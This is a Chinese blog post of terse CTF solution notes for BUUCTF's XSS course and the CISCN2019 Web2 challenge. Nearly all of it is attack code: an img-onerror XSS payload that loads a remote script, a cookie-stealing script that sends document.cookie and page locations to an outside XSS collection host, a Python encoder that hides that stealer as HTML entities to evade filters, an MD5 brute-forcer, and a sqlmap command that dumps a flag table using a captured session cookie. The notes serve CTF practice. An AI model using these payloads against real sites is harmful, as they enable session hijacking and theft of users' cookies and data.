CTF做题笔记6

已于 2022-02-20 20:56:44 修改
阅读量5k 收藏
点赞数 1
分类专栏: 笔记 文章标签: javascript 前端 web安全
于 2022-02-20 18:47:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forever_Han13/article/details/123034165
版权

BUU XSS COURSE 1:

</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F3MGcXr%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

cookie : PHPSESSID=aa9ffcc1c0a1023a58fe12ca9c37088e

[CISCN2019 华东北赛区] Web2:

(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcXr&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();

in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcXr&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"

output = ""

for c in in_str:
    output += "&#" + str(ord(c))

print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

<svg><script>eval&#40&#34&#40&#102&#117&#110&#99&#116&#105&#111&#110&#40&#41&#123&#119&#105&#110&#100&#111&#119&#46&#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#61&#39&#104&#116&#116&#112&#58&#47&#47&#120&#115&#115&#46&#98&#117&#117&#111&#106&#46&#99&#110&#47&#105&#110&#100&#101&#120&#46&#112&#104&#112&#63&#100&#111&#61&#97&#112&#105&#38&#105&#100&#61&#51&#77&#71&#99&#88&#114&#38&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#43&#101&#115&#99&#97&#112&#101&#40&#40&#102&#117&#110&#99&#116&#105&#111&#110&#40&#41&#123&#116&#114&#121&#123&#114&#101&#116&#117&#114&#110&#32&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#125&#99&#97&#116&#99&#104&#40&#101&#41&#123&#114&#101&#116&#117&#114&#110&#32&#39&#39&#125&#125&#41&#40&#41&#41&#43&#39&#38&#116&#111&#112&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#43&#101&#115&#99&#97&#112&#101&#40&#40&#102&#117&#110&#99&#116&#105&#111&#110&#40&#41&#123&#116&#114&#121&#123&#114&#101&#116&#117&#114&#110&#32&#116&#111&#112&#46&#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#125&#99&#97&#116&#99&#104&#40&#101&#41&#123&#114&#101&#116&#117&#114&#110&#32&#39&#39&#125&#125&#41&#40&#41&#41&#43&#39&#38&#99&#111&#111&#107&#105&#101&#61&#39&#43&#101&#115&#99&#97&#112&#101&#40&#40&#102&#117&#110&#99&#116&#105&#111&#110&#40&#41&#123&#116&#114&#121&#123&#114&#101&#116&#117&#114&#110&#32&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#125&#99&#97&#116&#99&#104&#40&#101&#41&#123&#114&#101&#116&#117&#114&#110&#32&#39&#39&#125&#125&#41&#40&#41&#41&#43&#39&#38&#111&#112&#101&#110&#101&#114&#61&#39&#43&#101&#115&#99&#97&#112&#101&#40&#40&#102&#117&#110&#99&#116&#105&#111&#110&#40&#41&#123&#116&#114&#121&#123&#114&#101&#116&#117&#114&#110&#32&#40&#119&#105&#110&#100&#111&#119&#46&#111&#112&#101&#110&#101&#114&#32&#38&#38&#32&#119&#105&#110&#100&#111&#119&#46&#111&#112&#101&#110&#101&#114&#46&#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#41&#63&#119&#105&#110&#100&#111&#119&#46&#111&#112&#101&#110&#101&#114&#46&#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#58&#39&#39&#125&#99&#97&#116&#99&#104&#40&#101&#41&#123&#114&#101&#116&#117&#114&#110&#32&#39&#39&#125&#125&#41&#40&#41&#41&#59&#125&#41&#40&#41&#59&#34&#41</script>

import hashlib

for i in range(1,100000000000):
    s = hashlib.md5(str(i).encode("utf-8")).hexdigest()[0:6]
    if s == "d5bd44":
        print(i)
        break

http://web/post/b2b166821b1e6c820f7b10dc35ea3568.html

PHPSESSID=5259aace979bfed1713367666f3483a4

sqlmap -u "http://89d2c8a1-39da-4f93-a59a-ce14d39f3c28.node4.buuoj.cn:81/admin.php?id=1" --cookie="PHPSESSID=5259aace979bfed1713367666f3483a4" -T flag --dump --flush-session --fresh-queries
N1etzsche
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
网安小趴菜
09-03 6014
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
BUUCTF--BUU XSS COURSE
qq_46263951的博客
07-18 3711
吐槽<img scr="javascript.:alert('xss');">可以发现这里存在一个存储型XSS漏洞
BUUCTF:Basic 解析(一)
Flag少侠的博客
04-28 681
Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1
CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 1497
有两个尝试点。
[网络安全自学篇] 2021年安全学习规划
D.T.69的博客
01-20 4524
在对2021年进行规划之前,先对2020年安全学习规划做一个总结。整体来说漏洞扫描等简单安全工作已经比较熟练,网络安全等技术术语也有一定涉及;虽然日常与运维和网络沟通较少,但日常沟通相比于2019有所提升。同时2020年也出现一个小插曲,7月一直教我技术的同事离职对我今年安全学习规划来说来说是一个不小的打击。 2021年的计划是多练习渗透测试,熟练渗透手法,多开发(python等)。在练习的过程中碰到问题再通过百度等解决,同时根据问题以点带面进行安全技术学习。欢迎各位大神提建议。谢谢。 推荐一个很.
[BT]BUUCTF刷题第12天(3.31)
Bluetuan的博客
04-01 483
经过尝试,在这里不管用,要用X-Real-IPBP抓包添加(注意这一行前面不要有空行)发送后返回提示了用户名和密码,这里直接给了,登录即可成功拿到flag。
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
ctf杂项解题中常用的exe软件
05-18
你也许可以下载到,也许你下载不到,都可以来找我哟!!!感谢你的赞助!!!
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
【网络安全CTFBUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6127
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
buuctf Basic
自强不息
02-16 734
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
BUUCTF)BUU SQL COURSE 1
weixin_63442046的博客
04-28 1636
关于BUU SQL COURSE 1的思路
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 446
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS
两道图片隐写的CTF
qq_39763436的博客
04-09 3887
题目链接:https://pan.baidu.com/s/1wfcn0wMs1G3zbz94CWjpwQ 提取码:dbb5 解题思路 1.查看图像属性详细信息是否有隐藏内容 2.利用winhex或nodepad++打开搜索ctf,CTF,flag,key等关键字是否存在相关信息 3.检查图像的开头标志和结束标志是否正确,若不正确修改图像标志恢复图像,打开查看是否有flag或ctf信息,(往往gif属于动图,需要分帧查看各帧图像组合所得数据 若不是直接的ctf或flag信息 需要考虑将其解码) jpg图像开始
BUUCTFbasic做题记录(1)
qq_51558360的博客
03-13 2511
Linux Labs 使用ssh连接,用户是 root,密码:123456, -p指定端口,端口是随机的 然后输入yes,后输入密码即可连接上了 ssh -p 25527 root@node3.buuoj.cn BUU LFI COURSE 1 ?file=/var/log/nginx/access.log :包含ngnix的日志记录 BUU CODE REVIEW 1 代码审计: 第一层 get post ?pleaseget=1 pleasepost=2 第二层 md5漏洞 传递md51和
BUUCTF--[CISCN2019 华东北赛区]Web2
qq_46263951的博客
07-25 415
进入之后我们看到的是一个blog页面, 随便注册一个账号进入 通过扫描目录发现admin.php,访问后给出以下提示 所以这里我们需要一个admin的cookie 再来看各个页面的作用 投稿:我们输入一段内容,然后会给出显示我们文章内容的链接,这里存在着存储型xss漏洞 反馈:通过提示我们可以知道我们提交反馈的链接admin用户会去访问,所以我们可以通过这里来获取的admin的cookie 大致流程:投稿处提交我们的xss代码--获取代码所在的链接--反馈给admin--获取cookie .
2020/7/17 - [CISCN2019 华东北赛区]Web2 - xss、html markup、SQL注入
抒情诗
07-17 307
做一道复杂的题锻炼一下 文章目录1.判断是xss2.盗cookie的payload3.SQL注入获得flag 1.判断是xss 这是一个类似博客的界面,而博客常见的漏洞就是xss,通过让别人浏览或者点击某处盗取身份。 由此处大概能感觉到是xss了,在内网xss平台弄(第二次搞xss,第一次是在pikachu上面弄的)。 2.盗cookie的payload 看了一下wp,因为我对xss并不是很熟悉,他们说要自动触发,需要把payload略改一下,改成下面。 (function(){window.locat
ctf garden解题
最新发布
04-30
CTF Garden是一个在线的CTF(Capture The Flag)平台,提供了各种类型的解题挑战,旨在帮助安全爱好者提升技能和知识。在CTF Garden中,你可以通过解决各种不同难度的题目来学习和实践网络安全相关的技术。 解题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值